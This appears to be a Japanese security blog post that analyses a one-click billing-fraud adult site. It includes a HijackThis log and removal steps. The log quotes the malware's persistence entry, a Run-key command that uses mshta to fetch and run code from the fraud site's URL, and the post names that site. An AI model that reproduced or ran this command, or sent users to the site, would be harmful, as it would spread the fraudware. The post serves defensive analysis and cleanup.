皆様、こんばんは。
それでは今回の投稿にまいりましょう。
【スポンサーリンク】
?原点回帰? 懐かしきワンクリサイト ADULT COLLECTION
>ADULT COLLECTION
http://www.oxygen-tank.org/
思えば2年前、知恵袋のセキュカテに初めて参加した時マルウェアに興味を持つきっかけとなったのがワンクリウェアでした。
当時はsasi40さんのツールをご紹介させていただくことだけでした。sasi40さんのサイトを見ながらツールがワンクリサイトに対応しているかどうか確認しながら回答していたものです。hijackthisを初めて知ったのもこの頃です。
初めはログといっても何が書いてあるのかさっぱりわからず・・・。
プロセス? レジストリ?何のことやらチンプンカンプンでしたね・・・。
さて実際にアクセスしてみると・・・
動画再生を2回クリックしダウンロード画面で実行をクリック。と・・・、alyacがhtaファイルを検出するも実行をクリックしたので請求画面の表示は阻止できず・・・。残念。以下が請求画面です。
昔のADULT COLLECTIONはもっと若い女性の請求画面だったはずなのに・・・。最近のワンクリサイトは本当に・・・
さてここでhijackthisにてログを取ります。ログは以下です。
Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 0:14:16, on 2012/05/01 Platform: Windows XP SP3 (WinNT 5.01.2600) MSIE: Internet Explorer v8.00 (8.00.6001.18702) Boot mode: Normal
Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\Program Files\Sandboxie\SbieSvc.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Virtual PC Integration Components\vmsrvc.exe C:\Program Files\ESTsoft\ALYac\AYRTSrv.aye C:\Program Files\ESTsoft\ALYac\AYUpdSrv.aye C:\Program Files\Secunia\PSI\PSIA.exe C:\Program Files\Secunia\PSI\sua.exe C:\WINDOWS\Explorer.EXE C:\Program Files\Virtual PC Integration Components\vmusrvc.exe C:\program files\estsoft\alyac\AYAgent.aye C:\WINDOWS\system32\ctfmon.exe C:\Program Files\Secunia\PSI\psi_tray.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\conime.exe C:\WINDOWS\system32\mshta.exe C:\WINDOWS\system32\svchost.exe C:\Program Files\Sandboxie\SbieCtrl.exe C:\Documents and Settings\Administrator\デスクトップ\HijackThis.exe
F2 – REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,rdpinit.exe, O2 – BHO: G Data CloudSecurity Class – {AADAC261-4EE9-473A-AB95-D8E153424C38} – C:\Program Files\G Data\G Data CloudSecurity\CloudSecurityIE.dll O2 – BHO: WOT Helper – {C920E44A-7F78-4E64-BDD7-A57026E7FEB7} – C:\Program Files\WOT\WOT.dll O3 – Toolbar: G Data CloudSecurity – {AADAC261-4EE9-473A-AB95-D8E153424C38} – C:\Program Files\G Data\G Data CloudSecurity\CloudSecurityIE.dll O3 – Toolbar: WOT – {71576546-354D-41c9-AAE8-31F2EC22BF0D} – C:\Program Files\WOT\WOT.dll O4 – HKLM\..\Run: [IMJPMIG8.1] “C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE” /Spoil /RemAdvDef /Migration32 O4 – HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC O4 – HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName O4 – HKLM\..\Run: [VMUserServices] C:\Program Files\Virtual PC Integration Components\vmusrvc.exe O4 – HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE O4 – HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC O4 – HKLM\..\Run: [ALYac] “c:\program files\estsoft\alyac\AYLaunch.exe” /run O4 – HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 – HKCU\..\Run: [SandboxieControl] “C:\Program Files\Sandboxie\SbieCtrl.exe” O4 – HKCU\..\Run: [www.adult-collection09.net] mshta http://www.oxygen-tank.org/regist2.php O4 – HKUS\S-1-5-19\..\Run: [ctfmon.exe] ctfmon.exe (User ‘LOCAL SERVICE’) O4 – HKUS\S-1-5-20\..\Run: [ctfmon.exe] ctfmon.exe (User ‘NETWORK SERVICE’) O4 – HKUS\S-1-5-18\..\Run: [ctfmon.exe] ctfmon.exe (User ‘SYSTEM’) O4 – HKUS\.DEFAULT\..\Run: [ctfmon.exe] ctfmon.exe (User ‘Default user’) O9 – Extra button: (no name) – {e2e2dd38-d088-4134-82b7-f2ba38496583} – C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 – Extra ‘Tools’ menuitem: @xpsp3res.dll,-20001 – {e2e2dd38-d088-4134-82b7-f2ba38496583} – C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O15 – ESC Trusted Zone: http://*.update.microsoft.com
>O4 – HKCU\..\Run: [www.adult-collection09.net] mshta http://www.oxygen-tank.org/regist2.php
レジストリ登録のみの初期型ワンクリウェアですね。最近ではあまり見かけなくなりましたタイプです。
該当のレジストリをhijackthisよりfixして、タスクマネージャーよりmshta.exeを停止して駆除完了。
今では何も思わなくなってしまいましたが、初めて実際に行った際ははうれしかったものです。
これからも初心を忘れずネットセキュリティに関わっていきたいと思います。
【スポンサーリンク】
「ワンクリックウェア駆除ツール」のインストール方法及び使い方
それでは次に「ワンクリックウェア駆除ツール」のインストール方法及び使い方について記載いたします。
「ワンクリックウェア駆除ツール」のインストール方法及び使い方に関する詳細については、すでに当ブログにおける以前の投稿で詳細を記載しているために、以下の「ワンクリックウェア駆除ツール」のインストール方法及び使い方に関する過去記事を参照してください。
<「ワンクリックウェア駆除ツール」のインストール方法及び使い方について>
1、URL
・「ワンクリックウェア駆除ツール」のインストール方法及び使い方について
「ワンクリックウェア駆除ツール」のインストール方法及び使い方に関する記載は以上です。
あとがき
さて今回の投稿は以上となります。
今回の投稿で記載する記事以外のセキュリティソフトの使い方に関連する記事に興味がある方は、ぜひ一度以下のセキュリティソフトの使い方に関連する記事のまとめを参照してください。
<セキュリティソフトの使い方に関連する記事のまとめ>
1、URL
それでは以上です。